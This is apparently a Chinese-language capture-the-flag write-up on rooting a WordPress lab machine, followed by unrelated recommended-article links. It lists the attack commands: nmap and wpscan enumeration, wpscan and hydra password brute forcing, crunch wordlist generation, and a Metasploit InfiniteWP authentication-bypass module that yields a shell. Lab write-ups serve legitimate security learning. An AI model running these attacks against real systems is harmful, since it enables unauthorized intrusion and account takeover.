靶机准备

先将靶机导入虚拟机,并将网络模式改为NAT



扫描不到ip,改VirtualBox,使用桥接,并将kali也改为桥接模式



扫描ip:192.168.0.102

netdiscover -r 192.168.0.0/24192.168.0.0/24



kali:192.168.0.105

渗透测试

扫描端口

nmap -sS -sV -T5 -A -p- 192.168.0.102



开放了3个端口

查看80端口



发现是wordpress的CMS框架

再用dirb扫描,确认一下



用wpscan扫描,枚举用户

wpscan --url http://192.168.0.102 -e u,p

扫描到一个用户:kitty



尝试爆破密码

wpscan --url http://192.168.0.102 -U kitty -P /usr/share/wordlists/rockyou.txt



半天爆不出来,尝试从插件入手,用此工具扫描其插件

wpscan --url http://192.168.0.102 -e u,p --plugins-detection mixed

扫描到插件iwp-client



发现有漏洞:



使用msf搜索此漏洞进行利用

search InfiniteWP

use exploit/unix/webapp/wp_infinitewp_auth_bypass

set lhost 192.168.0.105

set rhosts 192.168.0.102

set username kitty

exploit



成功拿到shell

挖掘信息

一直退到根目录下发现有一个kitty.txt文件,cat查看



有个提示,你的密码使用美元符+猫的名字+你出生的年份不是一个好密码

用kali下自带的crunch根据提示生成字典

命令:

crunch 13 13 -t "$"Minouche19%% -o 1.txt

crunch 13 13 -t "$"Minouche20%% -o 2.txt



用hydra爆破一波

hydra -l kitty -P 2.txt ssh://192.168.0.102

爆破出密码



利用得到的密码,登录



在目录下发现user.txt,cat查看



发现还有一个压缩包:android.zip

拷贝下来解压

scp kitty@192.168.0.102:~/android.zip /root



解压完以后多了一个data里面有很多数据



搜索数据库发现一个数据库里面有东西

find . -name *.db



打开数据库工具在里面发现有一长串数据



尝试用这串数据提权



提权成功

获取root目录下的数据

minouche的更多相关文章

随机推荐

  1. 《PHP程序员面试笔试真题解析》——新书上线

    你好,是我--琉忆.很高兴可以跟你分享我的新书. 很高兴,在出版了PHP程序员面试笔试宝典后迎来了我的第二本书出版--<PHP程序员面试笔试真题解析>. 如果你是一个热爱PHP的程序员,刚 ...

  2. 2、前端--初见前后端交互、CSS简介、基本选择器、组合选择器、属性选择器、分组与嵌套、伪类选择器

    今日内容概要 初窥后端框架 css简介 css选择器 今日内容详细 初次体验前后端交互 # 代码无需掌握 只看效果即可 """后端框架:可以简单的理解为别人写好的一个非常 ...

  3. Solution -「ARC 126E」Infinite Operations

    \(\mathcal{Description}\)   Link.   给定序列 \(\{a_n\}\),定义一次操作为: 选择 \(a_i<a_j\),以及一个 \(x\in\mathbb R ...

  4. Solution -「JLOI 2015」「洛谷 P3262」战争调度

    \(\mathcal{Description}\)   Link.   给定一棵 \(n\) 层的完全二叉树,你把每个结点染成黑色或白色,满足黑色叶子个数不超过 \(m\).对于一个叶子 \(u\), ...

  5. [LeetCode]1431. 拥有最多糖果的孩子

    给你一个数组 candies 和一个整数 extraCandies ,其中 candies[i] 代表第 i 个孩子拥有的糖果数目. 对每一个孩子,检查是否存在一种方案,将额外的 extraCandi ...

  6. 医疗BI系统的数据分析是怎样的?

    在社会日益发展和信息化的过程中,已经发展处行业化.智能化的各类IT系统及子系统,如ERP.CRM.财务等等.实现经营流程数字化的同时,各行业企业的数据库日益庞大,医疗行业也不例外.我国医疗行业经过多年 ...

  7. BI驾驶舱是什么?BI管理驾驶舱主要内容及特点

    BI驾驶舱,顾名思义就是商业智能中让企业管理者对企业的管理能够找到在飞机或汽车驾驶舱里面的驾驶感觉.BI管理驾驶舱系统是专为企业管理层设计的BI分析系统,,是为企业高层打造的虚拟办公场景,有利于更好地 ...

  8. hadoop 无法访问50070

    windows无法访问hadoop web端口 windows hosts文件:C:\Windows\System32\drivers\etc centos防火墙没有关,关闭参考 hadoop cor ...

  9. VUE3 之 使用标签实现动画与过渡效果 - 这个系列的教程通俗易懂,适合新手

    1. 概述 巴纳姆效应告诉我们: 人们更容易相信笼统的.常见的人格描述,并觉得特别适合自己,认为该描述真实地反映了自己的人格面貌. 这也是所有算命先生的小把戏,算命先生通常把话说的很笼统,很通用,基本 ...

  10. Docker-可视化管理工具总结-推荐使用Portainer

    对于初学docker的小白,一款好的可视化工具有助于快速掌握docker基本形态和概念,下面针对docker可视化工具做些总结 ui-for-docker UI For Docker是一个使用Dock ...